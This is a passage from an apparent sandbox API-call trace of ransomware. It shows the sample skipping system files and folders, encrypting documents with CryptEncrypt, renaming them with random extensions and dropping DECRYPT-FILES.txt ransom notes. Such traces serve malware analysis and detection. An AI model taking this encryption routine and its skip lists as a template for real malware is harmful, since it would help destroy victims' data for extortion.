pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.651] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0084.653] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.653] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0084.654] CloseHandle (hObject=0x0) returned 0 [0084.654] CloseHandle (hObject=0x438) returned 1 [0084.654] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.654] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.655] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\zpuJN1WAt0WkY.doc") returned 87 [0084.655] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\zpuJN1WAt0WkY.doc.bDjWT") returned 93 [0084.655] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\zpuJN1WAt0WkY.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\zpujn1wat0wky.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\zpuJN1WAt0WkY.doc.bDjWT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\zpujn1wat0wky.doc.bdjwt"), dwFlags=0x0) returned 1 [0084.655] FindClose (in: hFindFile=0x5f8b18 | out: hFindFile=0x5f8b18) returned 1 [0084.655] CloseHandle (hObject=0x428) returned 1 [0084.655] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe35f2bf0, ftCreationTime.dwHighDateTime=0x1d4cc67, ftLastAccessTime.dwLowDateTime=0x370df4a0, ftLastAccessTime.dwHighDateTime=0x1d4d3e5, ftLastWriteTime.dwLowDateTime=0x370df4a0, ftLastWriteTime.dwHighDateTime=0x1d4d3e5, nFileSizeHigh=0x0, nFileSizeLow=0x18609, dwReserved0=0x0, dwReserved1=0x0, cFileName="M7WNYa5Nq7JGPdqVYb7.csv", cAlternateFileName="M7WNYA~1.CSV")) returned 1 [0084.655] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv", lpString2="DECRYPT-FILES.txt") returned 1 [0084.655] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv", lpString2="autorun.inf") returned 1 [0084.656] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv", lpString2="boot.ini") returned 1 [0084.656] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv", lpString2="desktop.ini") returned 1 [0084.656] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv", lpString2="ntuser.dat") returned -1 [0084.656] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv", lpString2="iconcache.db") returned 1 [0084.656] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv", lpString2="bootsect.bak") returned 1 [0084.656] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv", lpString2="ntuser.dat.log") returned -1 [0084.656] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv", lpString2="thumbs.db") returned -1 [0084.656] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv", lpString2="Bootfont.bin") returned 1 [0084.656] lstrlenW (lpString="M7WNYa5Nq7JGPdqVYb7.csv") returned 23 [0084.656] lstrcmpiW (lpString1="csv", lpString2="lnk") returned -1 [0084.656] lstrcmpiW (lpString1="csv", lpString2="exe") returned -1 [0084.656] lstrcmpiW (lpString1="csv", lpString2="sys") returned -1 [0084.656] lstrcmpiW (lpString1="csv", lpString2="dll") returned -1 [0084.656] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0084.656] lstrlenW (lpString="M7WNYa5Nq7JGPdqVYb7.csv") returned 23 [0084.656] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0084.656] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="M7WNYa5Nq7JGPdqVYb7.csv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\M7WNYa5Nq7JGPdqVYb7.csv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\M7WNYa5Nq7JGPdqVYb7.csv" [0084.656] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\M7WNYa5Nq7JGPdqVYb7.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\m7wnya5nq7jgpdqvyb7.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.656] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=99849) returned 1 [0084.656] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.656] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.656] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.657] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.657] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.659] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.659] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.660] CloseHandle (hObject=0x0) returned 0 [0084.660] CloseHandle (hObject=0x428) returned 1 [0084.660] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.660] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.660] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\M7WNYa5Nq7JGPdqVYb7.csv") returned 80 [0084.660] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC") returned 87 [0084.661] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\M7WNYa5Nq7JGPdqVYb7.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\m7wnya5nq7jgpdqvyb7.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\m7wnya5nq7jgpdqvyb7.csv.fecxrc"), dwFlags=0x0) returned 1 [0084.661] lstrcmpiW (lpString1="MrkuYIww.pps", lpString2="DECRYPT-FILES.txt") returned 1 [0084.661] lstrcmpiW (lpString1="MrkuYIww.pps", lpString2="autorun.inf") returned 1 [0084.661] lstrcmpiW (lpString1="MrkuYIww.pps", lpString2="boot.ini") returned 1 [0084.661] lstrcmpiW (lpString1="MrkuYIww.pps", lpString2="desktop.ini") returned 1 [0084.661] lstrcmpiW (lpString1="MrkuYIww.pps", lpString2="ntuser.dat") returned -1 [0084.661] lstrcmpiW (lpString1="MrkuYIww.pps", lpString2="iconcache.db") returned 1 [0084.661] lstrcmpiW (lpString1="MrkuYIww.pps", lpString2="bootsect.bak") returned 1 [0084.661] lstrcmpiW (lpString1="MrkuYIww.pps", lpString2="ntuser.dat.log") returned -1 [0084.661] lstrcmpiW (lpString1="MrkuYIww.pps", lpString2="thumbs.db") returned -1 [0084.661] lstrcmpiW (lpString1="MrkuYIww.pps", lpString2="Bootfont.bin") returned 1 [0084.661] lstrlenW (lpString="MrkuYIww.pps") returned 12 [0084.661] lstrcmpiW (lpString1="pps", lpString2="lnk") returned 1 [0084.661] lstrcmpiW (lpString1="pps", lpString2="exe") returned 1 [0084.661] lstrcmpiW (lpString1="pps", lpString2="sys") returned -1 [0084.661] lstrcmpiW (lpString1="pps", lpString2="dll") returned 1 [0084.661] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0084.661] lstrlenW (lpString="MrkuYIww.pps") returned 12 [0084.662] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0084.662] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="MrkuYIww.pps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\MrkuYIww.pps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\MrkuYIww.pps" [0084.662] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\MrkuYIww.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\mrkuyiww.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.662] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=27877) returned 1 [0084.662] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.662] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.662] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.662] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.662] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.663] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.663] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.664] CloseHandle (hObject=0x0) returned 0 [0084.664] CloseHandle (hObject=0x428) returned 1 [0084.664] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.664] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.664] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\MrkuYIww.pps") returned 69 [0084.664] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\MrkuYIww.pps.fEcxRC") returned 76 [0084.664] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\MrkuYIww.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\mrkuyiww.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\MrkuYIww.pps.fEcxRC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\mrkuyiww.pps.fecxrc"), dwFlags=0x0) returned 1 [0084.665] lstrcatW (in: lpString1="narDJcaEcu74Unr7M", lpString2="\\" | out: lpString1="narDJcaEcu74Unr7M\\") returned="narDJcaEcu74Unr7M\\" [0084.665] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="narDJcaEcu74Unr7M\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" [0084.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\Program Files") returned 0x0 [0084.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch=":\\Windows") returned 0x0 [0084.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\Games\\") returned 0x0 [0084.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\Tor Browser\\") returned 0x0 [0084.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\ProgramData\\") returned 0x0 [0084.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0084.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0084.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0084.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\All Users") returned 0x0 [0084.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\IETldCache\\") returned 0x0 [0084.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\Local Settings\\") returned 0x0 [0084.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\AppData\\Local") returned 0x0 [0084.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="AhnLab") returned 0x0 [0084.666] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0084.666] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned 75 [0084.666] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.666] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\\\jkbimi8.tmp") returned 87 [0084.666] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x428 [0084.666] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned 75 [0084.666] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0084.666] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\\\DECRYPT-FILES.txt") returned 93 [0084.666] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0084.666] WriteFile (in: hFile=0x42c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0084.668] CloseHandle (hObject=0x42c) returned 1 [0084.675] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned 75 [0084.675] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\*" [0084.675] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc00d9a30, ftCreationTime.dwHighDateTime=0x1d4c62a, ftLastAccessTime.dwLowDateTime=0xaea91080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaea91080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b18 [0084.675] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.675] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc00d9a30, ftCreationTime.dwHighDateTime=0x1d4c62a, ftLastAccessTime.dwLowDateTime=0xaea91080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaea91080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.675] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.675] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.675] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddcfac60, ftCreationTime.dwHighDateTime=0x1d4cdb0, ftLastAccessTime.dwLowDateTime=0xfaa93590, ftLastAccessTime.dwHighDateTime=0x1d4cd2e, ftLastWriteTime.dwLowDateTime=0xfaa93590, ftLastWriteTime.dwHighDateTime=0x1d4cd2e, nFileSizeHigh=0x0, nFileSizeLow=0x4e73, dwReserved0=0x0, dwReserved1=0x0, cFileName="5jCFbrHSiWDWqLk.ods", cAlternateFileName="5JCFBR~1.ODS")) returned 1 [0084.675] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods", lpString2="DECRYPT-FILES.txt") returned -1 [0084.675] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods", lpString2="autorun.inf") returned -1 [0084.675] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods", lpString2="boot.ini") returned -1 [0084.675] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods", lpString2="desktop.ini") returned -1 [0084.675] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods", lpString2="ntuser.dat") returned -1 [0084.675] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods", lpString2="iconcache.db") returned -1 [0084.675] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods", lpString2="bootsect.bak") returned -1 [0084.675] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods", lpString2="ntuser.dat.log") returned -1 [0084.675] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods", lpString2="thumbs.db") returned -1 [0084.675] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods", lpString2="Bootfont.bin") returned -1 [0084.676] lstrlenW (lpString="5jCFbrHSiWDWqLk.ods") returned 19 [0084.676] lstrcmpiW (lpString1="ods", lpString2="lnk") returned 1 [0084.676] lstrcmpiW (lpString1="ods", lpString2="exe") returned 1 [0084.676] lstrcmpiW (lpString1="ods", lpString2="sys") returned -1 [0084.676] lstrcmpiW (lpString1="ods", lpString2="dll") returned 1 [0084.676] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned 75 [0084.676] lstrlenW (lpString="5jCFbrHSiWDWqLk.ods") returned 19 [0084.676] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" [0084.676] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpString2="5jCFbrHSiWDWqLk.ods" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\5jCFbrHSiWDWqLk.ods") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\5jCFbrHSiWDWqLk.ods" [0084.676] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.676] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\5jCFbrHSiWDWqLk.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\5jcfbrhsiwdwqlk.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0084.676] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=20083) returned 1 [0084.676] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0084.677] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.677] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.677] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.677] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.677] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, 